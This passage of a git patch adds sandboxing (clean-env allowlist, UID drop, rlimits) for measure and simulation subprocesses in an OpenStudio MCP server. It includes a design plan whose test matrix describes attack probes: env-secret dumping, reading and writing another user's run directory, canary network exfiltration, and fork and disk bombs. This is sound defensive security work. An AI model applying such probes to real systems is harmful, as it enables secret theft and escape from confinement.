From dcd16dfb5386f4d6417303acc9132e4d0e6026f1 Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sat, 6 Jun 2026 12:33:13 -0400
Subject: [PATCH 01/26] feat(security): confine measure/sim subprocess exec
 (sandbox increments 1-2)

Three exec sites (apply_measure, test_measure, sim _launch) now route through
mcp_server/sandbox.py, gated by OSMCP_SANDBOX (default off = passthrough):
- clean-env allowlist strips host env (secrets) from measure code
- UID drop to unprivileged `sandbox` user + rlimits via _sandbox_exec shim
- unconditional is_path_allowed() check on apply_measure(measure_dir)
- OSMCP_SIM_TIMEOUT_SECONDS config added (enforcement pending)

Dockerfile bakes the `sandbox` user. Landlock FS rules + seccomp net-deny
land next in _sandbox_exec. Security PoC suite kept local (git-excluded);
standalone security.yml workflow added (manual, no-op when suite absent).

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 .github/workflows/security.yml                |  38 ++
 docker/Dockerfile                             |   5 +
 docs/plans/measure-exec-sandbox.md            | 341 ++++++++++++++++++
 mcp_server/_sandbox_exec.py                   |  92 +++++
 mcp_server/config.py                          |  33 ++
 mcp_server/sandbox.py                         | 133 +++++++
 .../skills/measure_authoring/operations.py    |   3 +
 mcp_server/skills/measures/operations.py      |  22 +-
 mcp_server/skills/simulation/operations.py    |  10 +-
 9 files changed, 671 insertions(+), 6 deletions(-)
 create mode 100644 .github/workflows/security.yml
 create mode 100644 docs/plans/measure-exec-sandbox.md
 create mode 100644 mcp_server/_sandbox_exec.py
 create mode 100644 mcp_server/sandbox.py

diff --git a/.github/workflows/security.yml b/.github/workflows/security.yml
new file mode 100644
index 0000000..8f87f81
--- /dev/null
+++ b/.github/workflows/security.yml
@@ -0,0 +1,38 @@
+name: security
+
+# Dedicated workflow for the security / sandbox-confinement suite, kept separate
+# from the main `ci` shards so security tests live on their own.
+#
+# Manual-trigger only. The working exploit PoC (tests/test_sandbox.py) is
+# deliberately kept OUT of the public repo (see .git/info/exclude) until the
+# sandbox fix ships, so on a clean GitHub checkout this suite is a safe no-op —
+# it runs only where the security tests are actually present (local / self-hosted
+# checkout, or once the blocked-assertion suite is published).
+
+on:
+  workflow_dispatch:
+
+jobs:
+  security-tests:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Build image
+        run: docker build -f docker/Dockerfile -t openstudio-mcp:dev .
+
+      - name: Run security suite (if present)
+        env:
+          RUN_OPENSTUDIO_INTEGRATION: "1"
+          MCP_SERVER_CMD: "openstudio-mcp"
+        run: |
+          mkdir -p runs
+          FILES=$(ls tests/test_sandbox.py tests/test_security_*.py 2>/dev/null || true)
+          if [ -z "$FILES" ]; then
+            echo "No security tests present in this checkout (PoC kept local) — nothing to run."
+            exit 0
+          fi
+          echo "Running security tests: $FILES"
+          docker run --rm -v "$PWD:/repo" -v "$PWD/runs:/runs" \
+            -e RUN_OPENSTUDIO_INTEGRATION -e MCP_SERVER_CMD \
+            openstudio-mcp:dev bash -lc "cd /repo && pytest -vv $FILES"
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 588ec84..528fae0 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -7,6 +7,11 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
     ca-certificates curl \
     && rm -rf /var/lib/apt/lists/*
 
+# Unprivileged account that confined measure/simulation subprocesses drop to
+# (see mcp_server/_sandbox_exec.py). The server stays root; only the exec'd
+# measure/EnergyPlus child runs as this uid when OSMCP_SANDBOX is enabled.
+RUN useradd -r -u 1001 -s /usr/sbin/nologin sandbox
+
 # ComStock measures (openstudio-standards-based templates for space types,
 # constructions, HVAC, schedules). Only the measures/ directory is kept (~50 MB).
 ARG COMSTOCK_TAG=2025-3
diff --git a/docs/plans/measure-exec-sandbox.md b/docs/plans/measure-exec-sandbox.md
new file mode 100644
index 0000000..a467936
--- /dev/null
+++ b/docs/plans/measure-exec-sandbox.md
@@ -0,0 +1,341 @@
+# Measure-exec sandbox: keep the tools, confine the subprocess
+
+**Status:** researched, proposed · **Supersedes** the deny-tools approach in
+`safe-mode-disabled-tools.md` as the primary answer to external-review point 4.
+(Denylist stays as an operator opt-out knob, but it removes core functionality —
+not a real solution.)
+
+## Decision: follow the Codex CLI model
+
+Adopt OpenAI Codex CLI's architecture as the template (it solves our exact
+problem: confine a native subprocess inside a container we don't control), with
+one tightening:
+
+- **Landlock for the filesystem** — but **read-deny-by-default** (stricter than
+  Codex's read-allow-all). We can enumerate the few dirs `openstudio run` needs,
+  so we afford the stronger posture without breaking the happy path.
+- **seccomp BPF to block network** — deny `socket(AF_INET/AF_INET6)`, allow
+  `AF_UNIX`. This is how Codex blocks net on kernels < 6.7. **Key consequence:
+  net-deny works at ANY Landlock ABI (incl. our WSL2 abi3), unprivileged, no
+  launch flags** — installing a seccomp filter needs only `no_new_privs` (which
+  we already set for Landlock), and `seccomp`/`prctl` are in Docker's default
+  allowlist.
+- **no_new_privs + setuid drop + rlimits** underneath (the POSIX floor).
+- **bwrap** only as an opportunistic upgrade (adds mount/PID/net namespaces)
+  where a startup userns probe passes — never the baseline.
+- **Degrade loudly** — probe at startup, stamp the active tier into every exec's
+  audit line + tool output; `OSMCP_SANDBOX=off` must be explicit and is logged.
+
+Why Codex over Anthropic `sandbox-runtime`: srt's primary primitive is
+bwrap/userns — exactly what stock Linux Docker seccomp blocks. Codex's
+Landlock+seccomp needs no privileges and no launch flags, so it runs in the
+operator's unmodified container. srt's richer egress allowlist (external proxy)
+is overkill — we want net-deny, which a seccomp filter gives for free.
+
+**This collapses the tiers**: FS confinement (Landlock) + net-deny (seccomp) +
+UID/rlimits (POSIX) all run together in stock Docker ≥23.0 with zero launch
+flags. bwrap is a bonus, not a requirement.
+
+## Insight
+
+All arbitrary-code execution already funnels through 3 subprocess sites:
+
+| Site | Location | Cmd | Today |
+|---|---|---|---|
+| `apply_measure` | `skills/measures/operations.py:248` | `openstudio run --measures_only -w` | timeout 300s, full env, root |
+| `test_measure` | `skills/measure_authoring/operations.py:1015` | `pytest` / `ruby` | timeout 60s, full env, root |
+| `run_osw`/`run_simulation` | `skills/simulation/operations.py:265` (`_launch`) | `openstudio run -w` | **no timeout**, full env, root |
+
+The subprocess needs: ro on OpenStudio/EnergyPlus install, `/var/oscli` gems,
+`/opt/*-measures`, `/inputs`, `/repo`; rw ONLY on its run dir. Nothing else.
+That maps 1:1 onto a filesystem sandbox policy. Wrap these 3 sites → full
+functionality, contained blast radius.
+
+## Why not the alternatives
+
+- **WASM (pydantic mcp-run-python style):** can't run native EnergyPlus/Ruby. Out.
+- **microVMs (E2B/Modal/Firecracker/gVisor):** need host control / KVM; we're a
+  process inside someone's container. Host-level gVisor stays a docs recommendation.
+- **Static analysis of measure code:** bypassable, not security.
+- **NREL OpenStudio-server prior art:** none — zero sandboxing, single-tenant trust
+  model. We'd be ahead of upstream.
+- **Closest prior art:** OpenAI Codex CLI (Landlock + seccomp, bwrap where possible,
+  explicit degrade) and Anthropic sandbox-runtime (bwrap + seccomp + net proxy).
+
+## Design: tiered sandbox, probed at startup, best tier wins
+
+One wrapper at the 3 chokepoints, e.g. `mcp_server/sandbox_exec.py` (or a
+`sandboxed_run()` drop-in for `subprocess.run`/`Popen`):
+
+**Tier 0 — POSIX floor (always on):**
+- Drop root → dedicated `sandbox` UID via wrapper exec (`setpriv --reuid --regid
+  --clear-groups --no-new-privs`) — NOT `preexec_fn` (fork-safety in threaded server)
+- Run dirs `0700` sandbox-owned; install/mounts root-owned ro
+- rlimits: `RLIMIT_CPU`, `RLIMIT_FSIZE` (caps SQL/ESO blowups), `RLIMIT_NPROC`,
+  `RLIMIT_AS` (generous — EnergyPlus legitimately uses GBs), `RLIMIT_NOFILE`
+- Clean env: pass explicit allowlist (`PATH`, `RUBYLIB`, `ENERGYPLUS_EXE_PATH`,
+  bundler vars, `HOME=<run_dir>`, `TMPDIR=<run_dir>/tmp`) — today
+  `os.environ.copy()` leaks everything
+- `start_new_session=True` + kill process group on timeout/cancel
+
+**Tier 1 — Landlock LSM (default kernel sandbox):**
+- Works inside default-seccomp Docker ≥23.0, unprivileged, zero launch flags —
+  the only kernel sandbox with that property (`landlock_*` syscalls allowlisted
+  since moby 2022; verified in current default profile)
+- Policy: ro+exec `/usr`, `/lib*`, `/usr/local/openstudio-*`, `/var/oscli`,
+  `/opt/comstock-measures`, `/opt/common-measures`, `/inputs`, `/repo`;
+  rw only `<run_dir>`; requires `prctl(PR_SET_NO_NEW_PRIVS)` first
+- Landlock ABI ≥4 (kernel 6.7) can also deny TCP natively; WSL2 dev kernel =
+  ABI 3 (FS only, verified). We do NOT rely on this for network — see seccomp.
+- Implement: ~100-line ctypes module we own (PyPI `landlock` pkg is 27★/dev
+  release; `landrun` CLI is Go binary) — syscall surface is 3 calls
+
+**Tier 1b — seccomp BPF net-deny (rides with Landlock):**
+- BPF filter returning `EAFNOSUPPORT` for `socket(AF_INET/AF_INET6)`, allowing
+  `AF_UNIX` (so the OpenStudio bundler / local IPC still works). Installed in the
+  same wrapper right after `no_new_privs`.
+- Works at ANY kernel/ABI in stock Docker — this is our network control, not
+  Landlock-abi4 or bwrap. (Codex's exact mechanism.)
+- Implement: raw BPF in the wrapper shim, or `pyseccomp`/libseccomp if we accept
+  the dep. Lean raw-BPF to stay dep-free and grepable.
+
+**Tier 2 — bubblewrap (opportunistic upgrade):**
+- `bwrap --unshare-all --clearenv --die-with-parent` + ro-binds + run-dir bind:
+  adds mount-ns illusions + **network-ns (no net even on ABI 3 kernels)**
+- Blocked by stock Docker seccomp on Linux hosts (`clone(CLONE_NEWUSER)` denied
+  without CAP_SYS_ADMIN; moby#42441 still open). Docker Desktop/WSL2 ships
+  seccomp-unconfined → works there today (probed and confirmed in our dev container)
+- Enable only when startup userns probe passes; document operator flags
+  (custom seccomp profile > `--cap-add SYS_ADMIN`; Ubuntu 24.04 hosts also need
+  AppArmor userns relief) for Linux deployments that want tier 2
+
+**Probe at startup, audit one `sandbox_tier` event, and report the active tier
+in tool responses** (`"sandbox": "bwrap" | "landlock-abi3" | "posix" | "none"`)
+— degradation must be visible, never silent (Codex pattern).
+
+## Orthogonal quick wins (do regardless)
+
+1. `is_path_allowed()` check on `apply_measure(measure_dir=...)` — today accepts
+   any path holding a `measure.rb` (other users' runs!)
+2. Timeout (or operator-config max walltime) on `run_osw`/`run_simulation` —
+   only manual cancel today
+3. Clean env allowlist (tier 0 item, but ship first — trivial, closes secret leakage)
+
+## Optional human gate (HITL, not containment)
+
+MCP elicitation: FastMCP `ctx.elicit()` ≥2.10; Claude Code supports it ≥v2.1.76,
+Claude Desktop does NOT yet. Pattern: show measure code diff → accept/decline
+before exec. Fallback for non-supporting clients: return
+`{"needs_approval": true, "code_sha256": ...}` → second call with
+`approved_sha256=`. Complements sandbox; doesn't replace it (the LLM writes the
+code the human skims). Defer to v2 unless an operator asks.
+
+## Relation to safe-mode denylist
+
+Keep `OSMCP_DISABLED_TOOLS` / `OSMCP_SAFE_MODE` as a small operator knob
+(some deployments genuinely want measure-authoring off), but the sandbox is the
+primary control: tools stay on by default because their execution is confined.
+
+## Implementation order
+
+1. Quick wins (env allowlist, `measure_dir` path check, sim timeout) — small
+   **— DONE (increment 1):** `OSMCP_SANDBOX` knob + `mcp_server/sandbox.py`
+   clean-env allowlist wired into all 3 exec sites (`apply_measure`,
+   `test_measure`, sim `_launch`); unconditional `is_path_allowed` check on
+   `apply_measure(measure_dir=)`; `OSMCP_SIM_TIMEOUT_SECONDS` config added.
+   No Docker rebuild (pure Python). Default `off` = passthrough, so the existing
+   suite is untouched. Verified: clean-env hides the canary under `posix` and a
+   normal run still succeeds; traversal rejected; `test_measures` green.
+   **Still pending in this bucket:** wire the sim-timeout *enforcement* into the
+   dispatcher (config constant exists; `_launch`/dispatch loop must kill runs
+   past the cap via the existing SIGTERM→SIGKILL path).
+2. POSIX floor: setuid `sandbox` user + rlimits via `setpriv` wrapper — small/med
+   (needs Docker rebuild: `useradd sandbox`). Closes runs-as-root + rlimits.
+3. Landlock ctypes module + seccomp net-deny + probe + tier reporting — medium.
+   Closes filesystem escape + network exfil.
+4. bwrap backend + userns probe + operator docs — medium
+5. Elicitation gate — defer
+6. Flip default `OSMCP_SANDBOX` off → `auto` once the full suite passes confined.
+
+## Testing strategy
+
+Goal: tests that (a) **prove the holes exist today** without touching anything
+real, and (b) **prove each is closed** after the fix. Both halves run in CI.
+
+**Status (confirm-now half landed):** `tests/test_sandbox.py` — 3 integration
+tests, CI shard 2, all passing in ~11s. Confirms today (OSMCP_SANDBOX=off):
+measures run as root (uid 0), the server's env secret leaks in, reads/writes
+escape the run dir, network exfil to a localhost canary succeeds, and
+`apply_measure` accepts a `measure_dir` outside all allowed roots. Probes are
+generated at runtime via `create_measure` (Ruby + Python) so the real
+create→apply path is exercised. The `OSMCP_SANDBOX=auto` "blocked" counterparts
+are added with the fix.
+
+### Core principle — dual-run falsifiability
+
+Every security test runs the SAME attack measure twice:
+- `OSMCP_SANDBOX=off` → attack must **SUCCEED**. Proves the hole is real today
+  AND proves the attack mechanism actually fires. A sandbox test that can't show
+  the attack succeeding unsandboxed is vacuous (green for the wrong reason).
+- `OSMCP_SANDBOX=auto` (best active tier) → attack must be **BLOCKED**, with the
+  violation visible in tool output.
+
+A fix is "proven" only when the off-run breaches and the on-run blocks. The
+off-run is the regression guard against vacuous-green.
+
+### Safety — canaries + decoys, never real targets
+
+No test touches a real secret, real sensitive file, or real network:
+- **Decoy "victim" run** — fixture creates `runs/_decoy_victim/{run_record.json,
+  secret.txt}` (known content), a SIBLING of the granted run_dir → reading/writing
+  it from inside the sandbox is a genuine escape, but it sits on the disposable
+  runs volume and the fixture deletes it. (cross-user read/write.)
+- **Canary env secret** — launch the test server with
+  `OSMCP_CANARY_SECRET=do-not-leak-<rand>`. A fake value, never a real credential.
+  (the `os.environ.copy()` leak.)
+- **Localhost canary listener** — throwaway TCP server on `127.0.0.1:<port>`;
+  measure tries to POST the canary to it. Nothing leaves the machine. (net exfil.)
+- **Bounded resource probes (critical)** — the off/control run must NEVER run an
+  unbounded bomb. Fork test forks a fixed modest N (e.g. 64) and checks they
+  succeed → infers "no NPROC cap" without a real fork bomb. Disk test writes a
+  fixed small file in the control to confirm "no FSIZE cap" without filling disk.
+  CPU/memory controls are SKIPPED (can't bound an unlimited spin/alloc safely);
+  on-runs allocate/spin just past the configured cap and assert the cap fires.
+  Outer pytest timeout + an outer rlimit on the test process backstop everything.
+
+All attack measures are committed fixtures under `tests/assets/sandbox_probes/`,
+run only inside the disposable container.
+
+### How a probe measure reports outcome
+
+Each attack measure attempts the action, rescues the error, and
+`runner.registerInfo("PROBE <name> result=<ok|errno>")` — `apply_measure` returns
+runner messages, so the test asserts on them. The AUTHORITATIVE check is external
+ground truth (decoy file untouched / listener received nothing / recorded euid),
+not the measure's self-report. Two independent assertions per test.
+
+### Per-issue test matrix
+
+| # | Issue | Attack measure does | off (today) | on (fixed) | min tier |
+|---|---|---|---|---|---|
+| 1 | Write escape | `File.write` to decoy sibling dir | write succeeds, decoy modified | EACCES, decoy unchanged | landlock |
+| 2 | Read other user's run | `File.read` decoy `secret.txt` | returns known content | EACCES, content absent from output | landlock |
+| 3 | Env secret leak | dump ENV to run_dir | canary present | canary absent | posix (clean env) |
+| 4 | Runs as root | record `Process.uid` | uid==0 | uid==1001 (sandbox) | posix |
+| 5 | Network exfil | TCP connect+POST canary to 127.0.0.1 | listener receives canary | connection refused, nothing received | seccomp |
+| 6 | Fork storm | fork N=64 (bounded) | all succeed | blocked past NPROC cap | posix (rlimit) |
+| 7 | Disk bomb | write past FSIZE cap in run_dir | (control: small file, no cap) | SIGXFSZ/EFBIG at cap | posix (rlimit) |
+| 8 | CPU spin | busy loop | (control skipped) | SIGXCPU at CPU cap | posix (rlimit) |
+| 9 | Memory bomb | alloc past AS cap | (control skipped) | ENOMEM at cap | posix (rlimit) |
+| 10 | No sim timeout | sleep 60s, cap=5s | (control: outer timeout) | killed ~5s, status failed/timeout | walltime mgr |
+| 11 | measure_dir traversal | `apply_measure(measure_dir=<decoy victim>)` | copies/executes | `{ok:false, "not allowed"}` | path check (no exec) |
+
+### Tier-awareness (honest skips, not vacuous passes)
+
+Active tier depends on the runner's kernel/Docker:
+- Local WSL2 = landlock-abi3 + seccomp (+ bwrap if userns probe passes on Docker
+  Desktop's unconfined daemon).
+- CI ubuntu-24.04 = Docker ≥23 / kernel 6.x → landlock-abi4 + seccomp; bwrap
+  blocked by default seccomp.
+
+Each test declares its min tier (matrix col). If active tier < needed → **SKIP
+with a loud reason** ("net confinement needs seccomp; active=posix"), never
+silent-pass. Plus a **guard test**: in the integration env assert active tier ∈
+{landlock-abi3, landlock-abi4, bwrap}; FAIL if posix/none — that would mean the
+sandbox silently didn't engage and the whole suite is vacuous.
+
+### Tier-probe unit tests
+
+Force each tier path, assert the correct argv is built (setpriv / landlock-shim /
+bwrap) and that the probe downgrades correctly when a syscall is stubbed to fail.
+Unit tier (no `openstudio` import).
+
+### Repo compliance
+
+- Integration tier (real `openstudio` CLI, mock nothing),
+  `RUN_OPENSTUDIO_INTEGRATION=1`, AAA structure, `# Regression:`/`# Validates:`
+  comments, exact assertions incl. error-message text, `parametrize` the issue
+  set, add to the lightest CI shard.
+- New file `tests/test_sandbox.py` + fixtures `tests/assets/sandbox_probes/`.
+
+## Resolved decisions (defaults)
+
+Net effect: works in stock Docker, no launch flags, blast radius = the run dir,
+with operator knobs for looser (trusted/BCL) or tighter (cgroup memory) needs.
+
+1. **Min Docker version → don't gate; probe-and-degrade. Document 23.0 as the FS
+   line.** seccomp + UID + rlimits work on ~any Docker (those syscalls
+   default-allowed for years); only Landlock FS confinement needs ≥23.0. A hard
+   minimum would block legit operators for no safety gain — on old Docker you
+   lose FS-deny but keep net-deny + UID + rlimits, and the tier report says so.
+
+2. **One shared `sandbox` UID for v1, not per-run ephemeral.** Landlock isolates
+   the filesystem *per process* — two runs sharing UID 1001 each get a ruleset
+   granting only their own run_dir, so cross-run file access is blocked by
+   Landlock, not DAC; the UID barely matters for the main threat. Per-run UIDs
+   add a UID pool + chown + cleanup for little gain at `MAX_CONCURRENCY=1`
+   (current default). Close the same-UID residual (ptrace/signal between
+   concurrent runs) by adding `ptrace` to the seccomp deny list. Shared
+   `RLIMIT_NPROC` accounting is a minor co-tenant DoS, irrelevant at concurrency
+   1. **Upgrade trigger:** revisit per-run UIDs only if a multi-user deployment
+   raises per-user concurrency > 1.
+
+3. **seccomp net-deny via libseccomp (`pyseccomp`), not hand-rolled BPF.**
+   Security-critical filter, and we ship **amd64 + arm64** — raw BPF must
+   hand-handle `AUDIT_ARCH` + per-arch syscall numbers for both, and a
+   subtly-wrong filter fails open. libseccomp is what Docker itself uses,
+   abstracts the arch mess, and `libseccomp2` is already in the base image. The
+   repo's dep-minimization rule targets heavyweight *unnecessary* deps (the
+   OpenLLMetry case), not reimplementing a security primitive across two arches.
+   (Raw BPF acceptable ONLY with explicit amd64+arm64 AUDIT_ARCH handling + a
+   fail-closed test per arch — not worth it.)
+
+4. **rlimits = generous anti-runaway backstops, operator-tunable env vars; not
+   tight quotas.** A tight cap silently breaks real sims (EnergyPlus uses GBs,
+   annual SQL is hundreds of MB–GB) — worse than no cap for the modeler.
+   - `RLIMIT_AS`: **avoid as primary** — counts virtual address space (mmap'd
+     libs), breaks allocators. Unset or ~24 GB backstop; push real memory control
+     to container cgroup (`docker run --memory`), document that.
+   - `RLIMIT_FSIZE`: ~10 GB per-file runaway guard. Real disk control = retention
+     GC + per-run-dir quota (cgroup/quota territory, rlimit can't express).
+   - `RLIMIT_NPROC` ~512, `RLIMIT_NOFILE` ~4096, `RLIMIT_CPU` ~2× the existing
+     300 s measure timeout.
+
+5. **Sim walltime cap: add `OSMCP_SIM_TIMEOUT_SECONDS`, default 7200 (2 h),
+   0 = unlimited.** Real gap today (sims hang forever; manual cancel only). 2 h
+   is a hang-catcher, not a tight bound — big annual/parametric runs take
+   10–30+ min, so a low default would silently kill legit work. Reuse the
+   dispatcher's existing SIGTERM→SIGKILL path (`cancel_run`). Fire loudly:
+   status=`timeout`, clear error.
+
+6. **Own ctypes Landlock module, don't vendor `landrun`.** 3 syscalls, ~100
+   lines, fully grepable/auditable — matches house style ("everything direct,
+   visible in stack traces"). `landrun` is a young (Mar 2025) external Go binary
+   = supply-chain dep + vendoring across 2 arches + another thing to track, for
+   security-critical code we should own. PyPI `landlock` pkg is dev-release/27★ —
+   don't depend on that either. (Per-arch syscall-number care as in #3, but
+   Landlock numbers are stable.)
+
+7. **Sandbox `test_measure` too, same wrapper.** pytest/ruby on LLM-authored
+   measure code is the same arbitrary-exec threat as `apply_measure` — "test this
+   measure" *is* the trust-the-code moment. Its legit needs (own test fixtures,
+   test model) live in granted dirs. Caveat: a test that legitimately hits the
+   network (BCL download) breaks under net-deny — see #8.
+
+8. **Default net-deny; expose `OSMCP_SANDBOX_NET=deny|allow`; confirm
+   empirically.** `openstudio run -w` runs EnergyPlus locally and `--bundle`
+   resolves from the offline gem path → should need no AF_INET, so net-deny
+   shouldn't break normal runs — **but verify, don't assume** (smoke test: a
+   normal sim succeeds under net-deny). The real exception is BCL-downloading
+   measures (need AF_INET); blocking them is *correct* for untrusted mode but
+   trusted deployments want them — hence the toggle. AF_UNIX always allowed
+   (local IPC/bundler).
+
+## Still open (need your input)
+
+- Exact rlimit/timeout default *values* above — sane for your largest real
+  models? (chosen as backstops, not measured against a worst-case OSM)
+- Container-level memory cgroup: document-only, or ship a recommended
+  `--memory` in compose / run docs?
+- Per-run-dir disk quota — out of scope for v1, or needed now? (rlimit can't do
+  it; needs cgroup/quota)
diff --git a/mcp_server/_sandbox_exec.py b/mcp_server/_sandbox_exec.py
new file mode 100644
index 0000000..fa5ae1e
--- /dev/null
+++ b/mcp_server/_sandbox_exec.py
@@ -0,0 +1,92 @@
+"""Privilege-dropping exec shim for confined measure / simulation subprocesses.
+
+Invoked by mcp_server.sandbox.wrap_cmd as::
+
+    python3 -m mcp_server._sandbox_exec --uid N --gid N \
+        [--rlimit-fsize BYTES] [--rlimit-nproc N] [--rlimit-nofile N] \
+        [--rlimit-cpu SECONDS] [--rlimit-as BYTES] -- CMD [ARG...]
+
+Runs as root, applies rlimits, drops to the unprivileged uid/gid, sets
+``no_new_privs``, then ``execvp``s CMD. A standalone exec — NOT a Popen
+``preexec_fn`` — so there is no fork-safety hazard in the threaded server, and
+the dropped image keeps the same pid (so the dispatcher's existing
+terminate/kill-by-pid path still works). Landlock FS rules + a seccomp net-deny
+filter will be added here in the next increment, behind the same wrapper.
+"""
+from __future__ import annotations
+
+import argparse
+import ctypes
+import os
+import resource
+import sys
+
+_RLIMITS = {
+    "cpu": resource.RLIMIT_CPU,        # CPU-seconds
+    "fsize": resource.RLIMIT_FSIZE,    # max single-file bytes
+    "nproc": resource.RLIMIT_NPROC,    # processes/threads for the uid
+    "nofile": resource.RLIMIT_NOFILE,  # open file descriptors
+    "as": resource.RLIMIT_AS,          # virtual address space bytes
+}
+
+_PR_SET_NO_NEW_PRIVS = 38
+
+
+def _set_no_new_privs() -> None:
+    """Promise the kernel we will never gain privileges via setuid binaries.
+
+    Prerequisite for the unprivileged Landlock/seccomp backends landing next; set
+    here so the contract holds from the POSIX tier onward.
+    """
+    libc = ctypes.CDLL("libc.so.6", use_errno=True)
+    if libc.prctl(_PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0:
+        raise OSError(ctypes.get_errno(), "prctl(PR_SET_NO_NEW_PRIVS) failed")
+
+
+def main(argv: list[str]) -> int:
+    if "--" not in argv:
+        print("sandbox-exec: missing '-- CMD'", file=sys.stderr)
+        return 2
+    sep = argv.index("--")
+    cmd = argv[sep + 1:]
+    if not cmd:
+        print("sandbox-exec: empty command", file=sys.stderr)
+        return 2
+
+    ap = argparse.ArgumentParser(add_help=False)
+    ap.add_argument("--uid", type=int, required=True)
+    ap.add_argument("--gid", type=int, required=True)
+    for name in _RLIMITS:
+        ap.add_argument(f"--rlimit-{name}", type=int, default=0)
+    ns = ap.parse_args(argv[:sep])
+
+    # rlimits first, while still privileged (lowering hard limits is always ok).
+    for name, res_id in _RLIMITS.items():
+        val = getattr(ns, f"rlimit_{name}")
+        if val and val > 0:
+            try:
+                resource.setrlimit(res_id, (val, val))
+            except (ValueError, OSError) as e:
+                print(f"sandbox-exec: rlimit {name}={val} failed: {e}", file=sys.stderr)
+
+    _set_no_new_privs()
+
+    # Drop privileges: supplementary groups, then gid, then uid (order matters —
+    # setgroups/setgid require privilege we lose after setuid).
+    os.setgroups([ns.gid])
+    os.setgid(ns.gid)
+    os.setuid(ns.uid)
+    if os.getuid() != ns.uid or os.geteuid() != ns.uid:
+        print("sandbox-exec: uid drop did not stick", file=sys.stderr)
+        return 2
+
+    try:
+        os.execvp(cmd[0], cmd)  # noqa: S606 - intentional shell-less exec of the confined command
+    except OSError as e:
+        print(f"sandbox-exec: exec {cmd[0]} failed: {e}", file=sys.stderr)
+        return 127
+    return 0  # unreachable
+
+
+if __name__ == "__main__":
+    sys.exit(main(sys.argv[1:]))
diff --git a/mcp_server/config.py b/mcp_server/config.py
index 4c50bc5..22a20aa 100644
--- a/mcp_server/config.py
+++ b/mcp_server/config.py
@@ -58,6 +58,39 @@ def _safe_float(env_val: str, default: float) -> float:
 
 ENABLE_CODE_MODE = os.environ.get("OSMCP_CODE_MODE", "").lower() in ("1", "true")
 
+# Subprocess confinement for measure/simulation execution (see mcp_server/sandbox.py).
+#   off    — full passthrough (current behaviour / explicit escape hatch)
+#   posix  — clean-env allowlist (+ UID drop & rlimits in later increments)
+#   auto   — best confinement available (currently == posix)
+# Default off during rollout; flips to auto once the full suite passes confined.
+SANDBOX_MODE = os.environ.get("OSMCP_SANDBOX", "off").strip().lower()
+# Network policy for confined subprocesses: deny (default) blocks outbound TCP
+# once the seccomp backend lands; allow leaves it open (trusted/BCL deployments).
+SANDBOX_NET = os.environ.get("OSMCP_SANDBOX_NET", "deny").strip().lower()
+
+# Wall-clock cap for a single simulation (run_osw/run_simulation). 0 = no cap.
+SIM_TIMEOUT_SECONDS = _safe_float(
+    os.environ.get("OPENSTUDIO_MCP_SIM_TIMEOUT_SECONDS",
+                   os.environ.get("OSMCP_SIM_TIMEOUT_SECONDS", "7200")),
+    7200.0,
+)
+
+# Unprivileged account confined subprocesses drop to (baked into the image as
+# `sandbox`). See mcp_server/_sandbox_exec.py.
+SANDBOX_UID = _safe_int(os.environ.get("OSMCP_SANDBOX_UID", "1001"), 1001)
+SANDBOX_GID = _safe_int(os.environ.get("OSMCP_SANDBOX_GID", "1001"), 1001)
+
+# rlimit backstops for confined subprocesses (0 = off). Generous by design — they
+# catch runaway bombs, not tune normal use. CPU/AS default off: a CPU-second cap
+# would kill long annual sims, and RLIMIT_AS (virtual address space) breaks
+# EnergyPlus/allocators — real memory control belongs to the container cgroup.
+_GB = 1024 ** 3
+SANDBOX_RLIMIT_FSIZE = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_FSIZE", str(10 * _GB)), 10 * _GB)
+SANDBOX_RLIMIT_NPROC = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_NPROC", "1024"), 1024)
+SANDBOX_RLIMIT_NOFILE = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_NOFILE", "0"), 0)
+SANDBOX_RLIMIT_CPU = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_CPU", "0"), 0)
+SANDBOX_RLIMIT_AS = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_AS", "0"), 0)
+
 # Shared roots are read-only for everyone; the only per-user writable area is
 # RUN_ROOT/<user_key> (see user_run_root). Writes elsewhere are denied.
 _SHARED_READ_ROOTS = [
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
new file mode 100644
index 0000000..119bee6
--- /dev/null
+++ b/mcp_server/sandbox.py
@@ -0,0 +1,133 @@
+"""Confinement for the measure / simulation subprocesses (Codex-style, tiered).
+
+Everything an applied measure or a simulation runs goes through three subprocess
+sites — `apply_measure`, `test_measure`, and the sim dispatcher's `_launch`.
+They used to inherit the server's full environment via ``os.environ.copy()``.
+This module is the single chokepoint that confines them.
+
+`OSMCP_SANDBOX` (config.SANDBOX_MODE) selects the mode:
+  off    — full passthrough (current behaviour / explicit escape hatch)
+  posix  — clean-env allowlist (this increment); UID drop + rlimits + Landlock
+           FS policy + seccomp net-deny arrive in later increments, same knob
+  auto   — best confinement available (currently == posix)
+
+`off` is a true passthrough so an operator can deliberately disable confinement
+(the Codex ``danger-full-access`` model); the security PoC suite pins it to prove
+the holes still exist when off.
+
+Increment status: clean-env floor (build_env) + UID drop & rlimits (wrap_cmd /
+prepare_workdir, via _sandbox_exec). Landlock FS rules + seccomp net-deny land in
+_sandbox_exec next. `active_tier()` reports what is in effect so degradation is
+visible (never silent).
+"""
+from __future__ import annotations
+
+import contextlib
+import os
+import sys
+from pathlib import Path
+
+from mcp_server.config import (
+    SANDBOX_GID,
+    SANDBOX_MODE,
+    SANDBOX_RLIMIT_AS,
+    SANDBOX_RLIMIT_CPU,
+    SANDBOX_RLIMIT_FSIZE,
+    SANDBOX_RLIMIT_NOFILE,
+    SANDBOX_RLIMIT_NPROC,
+    SANDBOX_UID,
+)
+
+# Environment the OpenStudio CLI / bundler / EnergyPlus / measure code legitimately
+# needs. Everything else — notably any host secret — is dropped in confined modes.
+_ENV_ALLOW_EXACT = frozenset({
+    "PATH", "HOME", "USER", "LANG", "LC_ALL", "TZ", "TERM", "RUBYOPT",
+    "RUBYLIB", "RUBY_VERSION", "ENERGYPLUS_EXE_PATH",
